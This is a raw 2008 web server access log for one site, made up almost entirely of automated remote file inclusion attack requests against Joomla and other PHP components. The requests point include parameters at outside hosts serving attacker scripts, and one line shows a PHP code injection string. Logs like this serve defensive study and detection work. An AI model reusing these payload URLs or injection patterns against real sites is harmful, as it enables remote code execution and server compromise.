190.83.18.253 - - [31/Aug/2008:09:24:03 -0700] "GET /logs/access_080118.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:24:03 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:24:03 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.52.139.226 - - [31/Aug/2008:09:24:03 -0700] "GET /logs/access_080302.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [31/Aug/2008:09:24:05 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 89646 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [31/Aug/2008:09:24:05 -0700] "GET /logs/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:24:19 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [31/Aug/2008:09:24:19 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:09:24:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [31/Aug/2008:09:24:21 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dj-kelly.com/guestbook////log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:24:33 -0700] "GET /logs/access_080703.log//admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:24:33 -0700] "GET /logs/access_080703.log//admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:24:33 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:24:33 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:24:33 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:24:33 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.83.18.253 - - [31/Aug/2008:09:25:01 -0700] "GET /logs/access_080127.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:25:02 -0700] "GET /logs/access_080528.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:25:24 -0700] "GET /logs/access_080820.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:25:26 -0700] "GET /logs/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 63000 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:09:25:28 -0700] "GET /?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 200 89732 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:25:53 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [31/Aug/2008:09:25:54 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:25:54 -0700] "GET /logs/access_080528.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:25:54 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.29 - - [31/Aug/2008:09:25:55 -0700] "GET /logs/access_080725.log//admin/frontpage_right.php?loadadminpage=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:25:57 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT= HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:09:25:57 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT= HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:26:12 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:26:13 -0700] "GET /convert/mvcw.php?vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.116.102.204 - - [31/Aug/2008:09:26:21 -0700] "GET /logs/access_080607.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:26:23 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:09:26:24 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:26:35 -0700] "GET /logs/access_080820.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:26:38 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:09:26:38 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.253.139 - - [31/Aug/2008:09:27:16 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:27:19 -0700] "GET /logs/access_080820.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:27:20 -0700] "GET /logs/access_070927.log/index.php?p=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:27:22 -0700] "GET /index.php?p=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 89436 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.140.58 - - [31/Aug/2008:09:27:24 -0700] "GET /logs/index.php?p=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.234.16.214 - - [31/Aug/2008:09:27:27 -0700] "GET /logs/access_080615.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:27:42 -0700] "GET /logs/access_080615.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:09:27:44 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:45 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:09:27:46 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89671 "-" "libwww-perl/5.813" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:46 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:09:27:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:47 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:48 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89655 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:48 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:27:57 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.51.155.138 - - [31/Aug/2008:09:27:58 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:27:58 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:00 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.810" "www.dmulk.com"
66.185.168.98 - - [31/Aug/2008:09:28:00 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:00 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:02 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:02 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:03 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:03 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:04 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:04 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [31/Aug/2008:09:28:09 -0700] "GET /logs/access_080218.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:14 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:15 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89671 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:16 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:18 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
97.102.114.191 - - [31/Aug/2008:09:28:19 -0700] "GET /logs/access_080820.log/?sourcedir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:21 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:28:21 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:27 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:27 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:28 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89655 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:28 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89671 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:28:29 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:29 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:29 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.53 - - [31/Aug/2008:09:28:32 -0700] "GET /logs/access_080820.log/mcf.php?content=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:35 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:36 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89671 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:36 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:43 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:44 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:45 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:45 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:28:47 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:09:28:49 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:09:28:49 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:50 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:09:28:51 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:28:55 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.14.46.18 - - [31/Aug/2008:09:28:57 -0700] "GET /logs/access_080820.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:09:28:57 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:28:59 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [31/Aug/2008:09:29:07 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:29:15 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:29:15 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:29:16 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [31/Aug/2008:09:29:29 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.32.7 - - [31/Aug/2008:09:29:50 -0700] "GET /logs/access_080528.log//include.php?path[docroot]=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:29:51 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:29:52 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:29:53 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:29:55 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:29:55 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89687 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:29:56 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:30:08 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:30:09 -0700] "GET //index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 89655 "-" "libwww-perl/5.812" "www.dmulk.com"
78.159.107.230 - - [31/Aug/2008:09:30:09 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.243.130 - - [31/Aug/2008:09:30:09 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.179.226 - - [31/Aug/2008:09:30:11 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
164.41.101.38 - - [31/Aug/2008:09:30:16 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
164.41.101.38 - - [31/Aug/2008:09:30:17 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:30:18 -0700] "GET /logs/access_080109.log//application.php?base_path=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:30:18 -0700] "GET /logs//application.php?base_path=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.73.151 - - [31/Aug/2008:09:30:18 -0700] "GET //application.php?base_path=http://www.parsnegar.ir/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
